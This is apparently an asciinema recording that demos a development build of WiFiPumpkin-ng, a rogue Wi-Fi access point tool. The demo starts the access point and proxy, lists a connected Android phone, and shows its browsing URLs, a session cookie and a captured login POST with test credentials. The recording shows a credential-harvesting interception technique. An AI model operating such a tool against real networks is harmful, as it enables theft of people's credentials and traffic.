{"version": 2, "width": 107, "height": 25, "timestamp": 1520806263, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.122408, "o", "\u001b]0;mh4x0f@0xfl4bs: ~/Developer/WiFiPumpkin-ng\u0007\u001b[01;32mmh4x0f@0xfl4bs\u001b[00m:\u001b[01;34m~/Developer/WiFiPumpkin-ng\u001b[00m$ "]
[1.464765, "o", "l"]
[1.536281, "o", "s"]
[1.784274, "o", " "]
[1.992291, "o", "-"]
[2.168633, "o", "l"]
[2.288317, "o", "n"]
[2.464182, "o", "\r\n"]
[2.468539, "o", "total 28\r\n"]
[2.469603, "o", "drwxrwxr-x 10 1000 1000 4096 mar 11 18:57 \u001b[0m\u001b[01;34mcore\u001b[0m\r\n-rw-rw-r--  1 1000 1000  441 mar 11 19:11 demo.cast\r\ndrwxrwxr-x  6 1000 1000 4096 jan 31 21:38 \u001b[01;34mplugins\u001b[0m\r\n-rw-rw-r--  1 1000 1000   85 mar  2 16:38 requirements.txt\r\ndrwxrwxr-x  7 1000 1000 4096 mar  2 16:36 \u001b[01;34mtests\u001b[0m\r\ndrwxrwxr-x  5 1000 1000 4096 mar  2 17:18 \u001b[01;34mvenv\u001b[0m\r\n-rwxrwxr-x  1 1000 1000 1290 mar 11 18:53 \u001b[01;32mwifipumpkin-ng\u001b[0m\r\n"]
[2.471498, "o", "\u001b]0;mh4x0f@0xfl4bs: ~/Developer/WiFiPumpkin-ng\u0007\u001b[01;32mmh4x0f@0xfl4bs\u001b[00m:\u001b[01;34m~/Developer/WiFiPumpkin-ng\u001b[00m$ "]
[3.904516, "o", "s"]
[4.032575, "o", "u"]
[4.144111, "o", "d"]
[4.25603, "o", "o"]
[4.432235, "o", " "]
[4.656095, "o", "."]
[4.888248, "o", "/"]
[5.024674, "o", "w"]
[5.207105, "o", "ifipumpkin-ng "]
[5.728624, "o", "\r\n"]
[5.743494, "o", "[sudo] password for mh4x0f: "]
[7.464504, "o", "\r\n"]
[10.510401, "o", "\r\n _ _ _  _  ___  _       ___                   _    _      \r\n| | | |<_>| __><_> ___ | . \\ _ _ ._ _ _  ___ | |__<_>._ _ \r\n| | | || || _> | ||___||  _/| | || ' ' || . \\| / /| || ' |\r\n|__/_/ |_||_|  |_|     |_|  `___||_|_|_||  _/|_\\_\\|_||_|_|\r\n                                        |_|               \r\n"]
[10.646116, "o", "Author: \u001b[1m\u001b[33m@mh4x0f\u001b[0m P0cL4bs Team\r\nVersion: \u001b[1m\u001b[33m0.1\u001b[0m dev\r\n"]
[10.649788, "o", "Starting prompt...\r\n"]
[10.650548, "o", "\u001b[4m\u001b[1m\u001b[34mwp-ng\u001b[0m > "]
[11.504806, "o", "h"]
[11.600413, "o", "e"]
[11.848857, "o", "l"]
[12.040789, "o", "p"]
[12.256241, "o", "\r\n"]
[12.256833, "o", "\r\n\u001b[34m\u001b[1m[*]\u001b[0m Available Commands:\r\n=======================\r\n\r\n"]
[12.257326, "o", "    Commands\t Description\r\n    --------\t -----------\r\n    back      \t unload module on session\r\n    clients   \t show all clients connected on AP \r\n    exit      \t exit the program.\r\n    help      \t show this help \r\n    modules   \t show modules available\r\n    monitor   \t monitor traffic capture realtime Sniffer\r\n    search    \t search  modules by name\r\n"]
[12.257539, "o", "    start     \t start access point \r\n    stop      \t stop access point \r\n    use       \t load module on session\r\n\r\n\r\n"]
[12.258258, "o", "\u001b[4m\u001b[1m\u001b[34mwp-ng\u001b[0m > "]
[13.792826, "o", "s"]
[13.968596, "o", "t"]
[14.048479, "o", "a"]
[14.352762, "o", "rt"]
[14.768788, "o", "\r\n"]
[14.803178, "o", "\u001b[34m\u001b[1m[*]\u001b[0m configuring hostapd...\r\n"]
[14.803661, "o", "\u001b[32m\u001b[1m[+]\u001b[0m enable forwarding in iptables...\r\n"]
[14.937079, "o", "\u001b[34m\u001b[1m[*]\u001b[0m configuring dhcpd...\r\n"]
[14.939337, "o", "\u001b[34m\u001b[1m[*]\u001b[0m sharing internet connection with NAT...\r\n"]
[18.01743, "o", "\u001b[32m\u001b[1m[+]\u001b[0m starting hostpad pid: [13816]\r\n"]
[21.024038, "o", "\u001b[32m\u001b[1m[+]\u001b[0m proxy running on port:8080\r\n"]
[21.044413, "o", "PumpkinProxy::dump_post_data    status:On\r\n"]
[21.051817, "o", "\u001b[4m\u001b[1m\u001b[34mwp-ng\u001b[0m > "]
[21.576419, "o", "c"]
[21.704338, "o", "l"]
[21.79829, "o", "ients"]
[22.008609, "o", "\r\n"]
[22.153889, "o", "\u001b7\u001b[?47h\u001b[?1002l\u001b[?1000l\u001b[?1000h\u001b[?1002h\u001b)0"]
[22.161752, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[0;30;1;103m\u000fClients: \u001b[0;30;1;103m     \u001b[0;30;1;103mUP,DOWN:scroll     Monitor DHCPServer Requests\u001b[K\u001b[2;1H\u001b[0;39;49m\u000f┌─────────────────────────────────────────────────────────────────────────────────────────────────────────┐\u001b[3;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[4;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[5;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[6;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[7;1H\u001b[0;39;49m\u000f│                          "]
[22.162285, "o", "                                                                               │\u001b[8;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[9;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[10;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[11;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[12;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[13;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[14;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[15;1H\u001b[0;39;49m\u000f│                    "]
[22.16277, "o", "                                                                                     │\u001b[16;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[17;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[18;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[19;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[20;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[21;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[22;1H\u001b[0;39;49m\u000f│                                                                                                         │\u001b[23;1H\u001b[0;39;49m\u000f│            "]
[22.163007, "o", "                                                                                             │\u001b[24;1H\u001b[0;39;49m\u000f└─────────────────────────────────────────────────────────────────────────────────────────────────────────┘\u001b[25;1H\u001b[0;39;49m\u000fPress (\u001b[0;32;1;40mR\u001b[0;39;49m) to get a new client. Press (\u001b[0;31;1;40mQ\u001b[0;39;49m) to quit.\u001b[K"]
[27.504706, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[3;1H\u001b[0;39;49m\u000f│\u001b[0;39;49mHostname                  IpAddr     MacAddr            Vendor\u001b[0;39;49m                                           │\u001b[4;1H\u001b[0;39;49m\u000f│\u001b[0;39;49m------------------------  ---------  -----------------  ---------------------------------------\u001b[0;39;49m          │\u001b[5;1H\u001b[0;39;49m\u000f│\u001b[0;39;49mandroid-9b6a37abc9c05f8d  10.0.0.21  40:78:6a:6b:bd:cf  Motorola Mobility LLC, a Lenovo Company\u001b[0;39;49m          │"]
[32.255505, "o", "\u001b[?1002l\u001b[?1000l\u001b[0;39;49m\u000f\u001b[?47l\u001b8\u001b[?25h"]
[32.260945, "o", "\u001b[4m\u001b[1m\u001b[34mwp-ng\u001b[0m > "]
[35.200902, "o", "h"]
[35.304869, "o", "e"]
[35.440452, "o", "l"]
[35.496415, "o", "p"]
[35.704892, "o", "\r\n"]
[35.761297, "o", "\r\n\u001b[34m\u001b[1m[*]\u001b[0m Available Commands:\r\n=======================\r\n\r\n"]
[35.766763, "o", "    Commands"]
[35.767371, "o", "\t"]
[35.768499, "o", " Description"]
[35.769614, "o", "\r\n"]
[35.775925, "o", "    --------\t -----------\r\n"]
[35.781095, "o", "    back      \t unload module on session\r\n    clients   \t"]
[35.781622, "o", " show all clients connected on AP \r\n"]
[35.920893, "o", "    exit      "]
[35.926534, "o", "\t"]
[35.927702, "o", " exit the program."]
[35.928622, "o", "\r\n"]
[35.931159, "o", "    help      "]
[35.93215, "o", "\t"]
[35.932883, "o", " show this help "]
[35.933632, "o", "\r\n"]
[35.939438, "o", "    modules   \t show modules available\r\n    monitor   \t monitor traffic capture realtime Sniffer\r\n    search    \t search  modules by name\r\n    start     \t start access point \r\n"]
[35.955132, "o", "    stop      \t stop access point \r\n    use       \t load module on session\r\n"]
[35.960718, "o", "\r\n\r\n"]
[35.965936, "o", "\u001b[4m\u001b[1m\u001b[34mwp-ng\u001b[0m > "]
[36.832517, "o", "m"]
[36.93665, "o", "o"]
[37.223866, "o", "\u0007"]
[38.888938, "o", "n"]
[39.008611, "o", "i"]
[39.099431, "o", "tor"]
[39.32031, "o", "\r\n"]
[39.394514, "o", "\u001b7\u001b[?47h\u001b[?1002l\u001b[?1000l\u001b[?1000h\u001b[?1002h\u001b)0"]
[39.403062, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[0;96;44m\u000fESC\u001b[0;97;44m:quit        \u001b[0;96;44mUP\u001b[0;97;44m,\u001b[0;96;44mDOWN\u001b[0;97;44m:scroll\u001b[K\u001b[2;1H\u001b[0;97;49m\u000f┌────────────────────────────────────────────── URL Capture ──────────────────────────────────────────────┐\u001b[3;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m URL                                                                            | Method | Track         \u001b[0;97;49m│\u001b[4;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m---------------------------------------------------------------------------------------------------------\u001b[0;97;49m│\u001b[5;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m connectivitycheck.gstatic.com/generate_204                                     |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[6;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[7;1H\u001b[0;97;49m\u000f│ "]
[39.403556, "o", "                                                                                                        │\u001b[8;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[9;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[10;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[11;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[12;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[13;1H\u001b[0;97;49m\u000f└────────────────────────────────────────────────────────────────────────────────────"]
[39.40413, "o", "─────────────────────┘\u001b[14;1H\u001b[0;97;49m\u000f┌─────────────────────────────────────────────── Dump POST ───────────────────────────────────────────────┐\u001b[15;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[16;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[17;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[18;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[19;1H\u001b[0;97;49m\u000f│                                                                                                         "]
[39.404573, "o", "│\u001b[20;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[21;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[22;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[23;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[24;1H\u001b[0;97;49m\u000f└─────────────────────────────────────────────────────────────────────────────────────────────────────────┘\u001b[25;1H\u001b[0;97;44m\u000fEdit:\u001b[K"]
[52.356532, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[6;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m ww17.test.org/                                                                 |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│"]
[75.293155, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[7;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/                                                              |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│"]
[79.629802, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[8;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/include/aateststyles.css                                      |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│"]
[82.210453, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[9;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/spacer.gif                                                    |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[10;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/pilots-toolbox.jpg                                     |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│"]
[82.860212, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[11;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/testbanL.jpg                                           |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│"]
[83.378884, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[3;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m connectivitycheck.gstatic.com/generate_204                                     |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[4;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m ww17.test.org/                                                                 |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[5;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/                                                              |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[6;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/include/aateststyles.css                                      |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[7;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/spacer.gif                                                    |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[8;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/pilots-toolbox.jpg                                     |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[9;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/testbanL.jpg                                           |"]
[83.379441, "o", "  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[10;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/sidemenuban.gif                                        |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[11;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/testbanM.jpg                                           |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[12;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/footer.jpg                                             |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│"]
[108.547775, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[3;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m ww17.test.org/                                                                 |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[4;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/                                                              |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[5;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/include/aateststyles.css                                      |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[6;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/spacer.gif                                                    |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[7;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/pilots-toolbox.jpg                                     |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[8;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/testbanL.jpg                                           |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[9;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/sidemenuban.gif                                        |"]
[108.548053, "o", "  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[10;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/testbanM.jpg                                           |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[11;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/images/footer.jpg                                             |  GET   | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[12;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m www.aavtrain.com/index.asp                                                     |  POST  | [ 10.0.0.21 ] \u001b[0;97;49m│\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mHeaders\u001b[0;39;49m]\u001b[0;97;49m                                                                                                │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m                Host : www.aavtrain.com\u001b[0;97;49m                                                                  │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m          User-Agent : Mozilla/5.0 (Android 7.1.2; Mobile; rv:59.0) Gecko/59.0 Firefox/59.0\u001b[0;97;49m              │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Accept : text/html,applicati"]
[108.54823, "o", "on/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u001b[0;97;49m                   │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m     Accept-Language : pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3\u001b[0;97;49m                                               │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m     Accept-Encoding : gzip, deflate\u001b[0;97;49m                                                                     │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m             Referer : http://www.aavtrain.com/\u001b[0;97;49m                                                          │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m          Connection : keep-alive\u001b[0;97;49m                                                                        │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m      Content-Length : 62\u001b[0;97;49m                                                                                │"]
[111.979301, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H"]
[113.431716, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u001b[0;97;49m                   │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m     Accept-Language : pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3\u001b[0;97;49m                                               │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m     Accept-Encoding : gzip, deflate\u001b[0;97;49m                                                                     │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m             Referer : http://www.aavtrain.com/\u001b[0;97;49m                                                          │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m          Connection : keep-alive\u001b[0;97;49m                                                                        │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m      Content-Length : 62\u001b[0;97;49m                                                                                │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Content-Type : application/x-www-form-urlencoded\u001b[0;97;49m        "]
[113.43225, "o", "                                         │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Cookie : ASPSESSIONIDCQDRBRDA=AMLDHENCICFIFMDEOLPBANLO\u001b[0;97;49m                                     │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m  Additional-Headers : Upgrade-Insecure-Requests: 1?\u001b[0;97;49m                                                     │"]
[113.77712, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m     Accept-Language : pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3\u001b[0;97;49m                                               │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m     Accept-Encoding : gzip, deflate\u001b[0;97;49m                                                                     │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m             Referer : http://www.aavtrain.com/\u001b[0;97;49m                                                          │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m          Connection : keep-alive\u001b[0;97;49m                                                                        │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m      Content-Length : 62\u001b[0;97;49m                                                                                │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Content-Type : application/x-www-form-urlencoded\u001b[0;97;49m                                                 │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Cookie : ASPSESSIONIDCQDRBRDA=AMLDHENCICFIFMDEOLPBANLO\u001b[0;97"]
[113.777674, "o", ";49m                                     │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m  Additional-Headers : Upgrade-Insecure-Requests: 1?\u001b[0;97;49m                                                     │\u001b[23;1H\u001b[0;97;49m\u000f│                                                                                                         │"]
[114.101677, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m     Accept-Encoding : gzip, deflate\u001b[0;97;49m                                                                     │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m             Referer : http://www.aavtrain.com/\u001b[0;97;49m                                                          │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m          Connection : keep-alive\u001b[0;97;49m                                                                        │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m      Content-Length : 62\u001b[0;97;49m                                                                                │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Content-Type : application/x-www-form-urlencoded\u001b[0;97;49m                                                 │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Cookie : ASPSESSIONIDCQDRBRDA=AMLDHENCICFIFMDEOLPBANLO\u001b[0;97;49m                                     │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m  Additional-Headers : Upgrade-Insecure-Requests: 1?\u001b[0;97;49m            "]
[114.10223, "o", "                                         │\u001b[22;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Method : POST\u001b[0;97;49m                                                                              │"]
[114.927632, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m          Connection : keep-alive\u001b[0;97;49m                                                                        │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m      Content-Length : 62\u001b[0;97;49m                                                                                │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Content-Type : application/x-www-form-urlencoded\u001b[0;97;49m                                                 │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Cookie : ASPSESSIONIDCQDRBRDA=AMLDHENCICFIFMDEOLPBANLO\u001b[0;97;49m                                     │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m  Additional-Headers : Upgrade-Insecure-Requests: 1?\u001b[0;97;49m                                                     │\u001b[20;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Method : POST\u001b[0;97;49m                                                         "]
[114.928184, "o", "                     │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m                Path : /index.asp\u001b[0;97;49m                                                                        │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Http-Version : HTTP/1.1\u001b[0;97;49m                                                                          │"]
[115.597093, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m  Additional-Headers : Upgrade-Insecure-Requests: 1?\u001b[0;97;49m                                                     │\u001b[16;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Method : POST\u001b[0;97;49m                                                                              │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m                Path : /index.asp\u001b[0;97;49m                                                                        │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Http-Version : HTTP/1.1\u001b[0;97;49m                                                                          │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mBody\u001b[0;39;49m]\u001b[0;97;49m                                                                                                   │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000000:  75 73 65 72 5f 6e 61 6d  65 3d 75 73 65 72 78 74   |user_name=u"]
[115.597615, "o", "serxt|\u001b[0;97;49m                         │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000010:  65 73 74 26 70 61 73 73  77 6f 72 64 3d 70 61 73   |est&password=pas|\u001b[0;97;49m                         │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000020:  73 77 6f 72 64 26 53 75  62 6d 69 74 3d 53 75 62   |sword&Submit=Sub|\u001b[0;97;49m                         │"]
[115.682172, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│                                                                                                         │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Method : POST\u001b[0;97;49m                                                                              │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m                Path : /index.asp\u001b[0;97;49m                                                                        │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Http-Version : HTTP/1.1\u001b[0;97;49m                                                                          │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mBody\u001b[0;39;49m]\u001b[0;97;49m                                                                                                   │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000000:  75 73 65 72 5f 6e 61 6d  65 3d 75 73 65 72 78 74   |user_name=userxt|\u001b[0;97;49m                         │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000010:  65 73 74 26 70 61 73 73  77 6f 72 64 3d 70 61 73   |est&passwor"]
[115.68243, "o", "d=pas|\u001b[0;97;49m                         │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000020:  73 77 6f 72 64 26 53 75  62 6d 69 74 3d 53 75 62   |sword&Submit=Sub|\u001b[0;97;49m                         │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000030:  6d 69 74 26 6c 6f 67 69  6e 3d 74 72 75 65         |mit&login=true|\u001b[0;97;49m                           │"]
[115.982307, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m              Method : POST\u001b[0;97;49m                                                                              │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m                Path : /index.asp\u001b[0;97;49m                                                                        │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Http-Version : HTTP/1.1\u001b[0;97;49m                                                                          │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mBody\u001b[0;39;49m]\u001b[0;97;49m                                                                                                   │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000000:  75 73 65 72 5f 6e 61 6d  65 3d 75 73 65 72 78 74   |user_name=userxt|\u001b[0;97;49m                         │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000010:  65 73 74 26 70 61 73 73  77 6f 72 64 3d 70 61 73   |est&password=pas|\u001b[0;97;49m                         │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000020:  73 77 6f 72 64 26 53 75  62 6d 69 74 3d 53 "]
[115.982874, "o", "75 62   |sword&Submit=Sub|\u001b[0;97;49m                         │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000030:  6d 69 74 26 6c 6f 67 69  6e 3d 74 72 75 65         |mit&login=true|\u001b[0;97;49m                           │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mCredentials\u001b[0;39;49m]\u001b[0;97;49m                                                                                            │"]
[116.362318, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m                Path : /index.asp\u001b[0;97;49m                                                                        │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Http-Version : HTTP/1.1\u001b[0;97;49m                                                                          │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mBody\u001b[0;39;49m]\u001b[0;97;49m                                                                                                   │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000000:  75 73 65 72 5f 6e 61 6d  65 3d 75 73 65 72 78 74   |user_name=userxt|\u001b[0;97;49m                         │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000010:  65 73 74 26 70 61 73 73  77 6f 72 64 3d 70 61 73   |est&password=pas|\u001b[0;97;49m                         │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000020:  73 77 6f 72 64 26 53 75  62 6d 69 74 3d 53 75 62   |sword&Submit=Sub|\u001b[0;97;49m                         │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000030:  6d 69 74 26 6c 6f 67 69  6e 3d 74 72 75 65 "]
